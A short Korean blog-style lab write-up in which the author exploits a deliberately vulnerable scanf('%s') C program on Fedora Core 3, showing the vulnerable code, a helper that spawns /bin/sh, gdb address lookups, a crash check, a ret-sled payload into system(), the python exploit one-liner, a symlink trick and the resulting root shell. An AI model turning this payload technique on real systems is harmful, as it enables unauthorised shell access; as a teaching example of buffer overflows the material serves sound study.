심심해서 테스트해 본 scanf 오버플로우..

Scanf 환경에서의 아주아주 simple한 오버플로우 테스트.

환경 

FEDORA 3

[root@Fedora_1stFloor test]# uname -a

Linux Fedora_1stFloor 2.6.9-1.667 #1 Tue Nov 2 14:41:25 EST 2004 i686 i686 i386 GNU/Linux

[root@Fedora_1stFloor test]# gcc v

gcc: v: No such file or directory

gcc: no input files

[root@Fedora_1stFloor test]# gcc -v

Reading specs from /usr/lib/gcc/i386-redhat-linux/3.4.2/specs

Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-java-awt=gtk --host=i386-redhat-linux

Thread model: posix

gcc version 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)

[root@Fedora_1stFloor test]# 

취약한 코드 

[root@Fedora_1stFloor test]# cat scanf.c #include<stdio.h> int main(){ char buff[100]; scanf("%s",buff); printf("%s",buff); return 0; }

공격은 가호 안살지만 간단한 테스트를 위해 심볼릭 링크를 이용하겠다. 

[root@Fedora_1stFloor test]# cat system.c

#include<stdio.h>

int main(){

system("/bin/sh");

return 0;

}

[root@Fedora_1stFloor test]# 

필요한 주소값들 조사.

0x080483e6 <main+74>: ret  (gdb) p system $1 = {<text variable, no debug info>} 0x7507c0 <system> (gdb) p execve $2 = {<text variable, no debug info>} 0x7a5490 <execve>

오버플로우 발생 확인 RET주소 덮여쓰여지는 것 확인 

[root@Fedora_1stFloor test]# ulimit -c 1000 [root@Fedora_1stFloor test]# (python -c 'print "A"*128')|./scanf [root@Fedora_1stFloor test]# gdb -c core.13235  GNU gdb Red Hat Linux (6.1post-1.20040607.41rh) Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB.  Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu". Core was generated by `./scanf'. Program terminated with signal 11, Segmentation fault. #0  0x41414141 in ?? () (gdb)

공격 PAYLOAD 

[buffer 120byte ] [sfp = 4byte] [ret = 4byte] [argc ][argv]

AAAAA.....AAA   AAAA             &ret -> &ret -> &ret -> &ret  &system

                                             (정적인 주소까지 eip를 올린다)   

 

[root@Fedora_1stFloor test]# (python -c 'print "A"*124+"\xe6\x83\x04\x08"*5+"\xc0\x07\x75"' )| strace -i  ./scanf

[007037a2] clone(sh: AAAA: command not found

child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xfee68ee0) = 13255

[007037a2] waitpid(13255, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], 0) = 13255

[007037a2] rt_sigaction(SIGINT, {SIG_DFL}, NULL, 8) = 0

[007037a2] rt_sigaction(SIGQUIT, {SIG_DFL}, NULL, 8) = 0

[root@Fedora_1stFloor test]#

[root@Fedora_1stFloor test]# ln -s system AAAA 

[root@Fedora_1stFloor test]# (python -c 'print "A"*124+"\xe6\x83\x04\x08"*5+"\xc0\x07\x75"' ;cat)|  ./scanf

id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk)

다들 scanf 쓰실때 버퍼 오버 플로우 조심하쎄요~